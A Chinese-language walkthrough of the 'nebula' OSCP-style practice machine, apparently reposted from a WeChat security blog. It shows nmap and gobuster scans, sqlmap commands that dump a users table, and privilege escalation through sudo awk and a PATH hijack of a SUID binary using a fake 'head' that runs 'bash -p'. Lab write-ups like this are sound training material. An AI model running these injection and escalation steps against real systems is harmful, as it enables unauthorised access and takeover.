【OSCP】nebula

admin
admin
admin
102611
文章
87
评论
2024年4月15日03:26:47评论2 views字数 4212阅读14分2秒阅读模式
【OSCP】nebula

OSCP 靶场

【OSCP】nebula

靶场介绍

nebula

easy

信息收集、漏洞挖掘、sql注入、suod-awk 提权、suid 提权、$PATH环境变量提权

信息收集

主机发现

nmap -sn 192.168.1.0/24

【OSCP】nebula

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.232
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-10 05:09 EST
Nmap scan report for 192.168.1.232
Host is up (0.0018s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 63:9c:2e:57:91:af:1e:2e:25:ba:55:fd:ba:48:a8:60 (RSA)
|   256 d0:05:24:1d:a8:99:0e:d6:d1:e5:c5:5b:40:6a:b9:f9 (ECDSA)
|_  256 d8:4a:b8:86:9d:66:6d:7f:a4:cb:d0:73:a1:f4:b5:19 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Nebula Lexus Labs
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:FA:F9:B9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 5.1 (91%), Linux 2.6.32 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.84 ms 192.168.1.232

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.232 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.232
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.232/.php                 (Status: 403) [Size: 278]
http://192.168.1.232/index.php            (Status: 200) [Size: 3479]
http://192.168.1.232/.html                (Status: 403) [Size: 278]
http://192.168.1.232/img                  (Status: 301) [Size: 312] [--> http://192.168.1.232/img/]
http://192.168.1.232/login                (Status: 301) [Size: 314] [--> http://192.168.1.232/login/]
http://192.168.1.232/joinus               (Status: 301) [Size: 315] [--> http://192.168.1.232/joinus/]                                                                                                
http://192.168.1.232/.html                (Status: 403) [Size: 278]
http://192.168.1.232/.php                 (Status: 403) [Size: 278]
http://192.168.1.232/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

【OSCP】nebula

【OSCP】nebula

通过上面泄露的账号密码进入后台

【OSCP】nebula

权限获取

登录系统后发现里面存在sql注入漏洞

【OSCP】nebula

【OSCP】nebula

sqlmap -u 'http://192.168.1.232/login/search_central.php?id=1' --cookie="PHPSESSID=nu334p8hs5sg244n2tmm5ndkpd"
sqlmap -u 'http://192.168.1.232/login/search_central.php?id=1' --cookie="PHPSESSID=nu334p8hs5sg244n2tmm5ndkpd" -D nebuladb -tables
sqlmap -u 'http://192.168.1.232/login/search_central.php?id=1' --cookie="PHPSESSID=nu334p8hs5sg244n2tmm5ndkpd" -D nebuladb -T users -dump

dump user 表获取到pmccentral 账号密码,尝试登录ssh ,成功获取系统权限

【OSCP】nebula

【OSCP】nebula

权限提升

documents 目录下,发现一个类似字典的文件,但是爆破失败

【OSCP】nebula

【OSCP】nebula

通过sudo awk 成功提权到laboratoryadmin 账号

【OSCP】nebula

这里有个suid 权限的文件,和一个假的head文件,里面是bash -p。strings 查看PMCEmployees字符串发现会执行head /home/pmccentral/documents/employees.txt。那么我们可以修改环境变量$path 来改变PMCEmployees 里面执行的head 命令为那个假的head文件。

【OSCP】nebula

【OSCP】nebula

【OSCP】nebula

laboratoryadmin@laboratoryuser:~/autoScripts$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
laboratoryadmin@laboratoryuser:~/autoScripts$ PATH=$(pwd):$PATH
laboratoryadmin@laboratoryuser:~/autoScripts$ echo $PATH
/home/laboratoryadmin/autoScripts:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

PATH=$(pwd):$PATH 这个命令是在Linux或类Unix系统中使用的,用于修改环境变量PATHPATH环境变量定义了系统在查找可执行文件时搜索的目录列表。

  • $(pwd)是一个命令替换,它会被当前工作目录的路径所替换。

  • $PATH是当前PATH环境变量的值。

所以,PATH=$(pwd):$PATH这个命令的意思是将当前工作目录添加到PATH环境变量的前面。这样做的结果是,当你尝试运行一个程序时,系统会首先在当前目录中查找可执行文件,然后再按照PATH变量中定义的其他目录顺序查找。

【OSCP】nebula

End

“点赞、在看与分享都是莫大的支持”

【OSCP】nebula

【OSCP】nebula

原文始发于微信公众号(贝雷帽SEC):【OSCP】nebula

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月15日03:26:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】nebulahttps://cn-sec.com/archives/2658293.html

发表评论

匿名网友 填写信息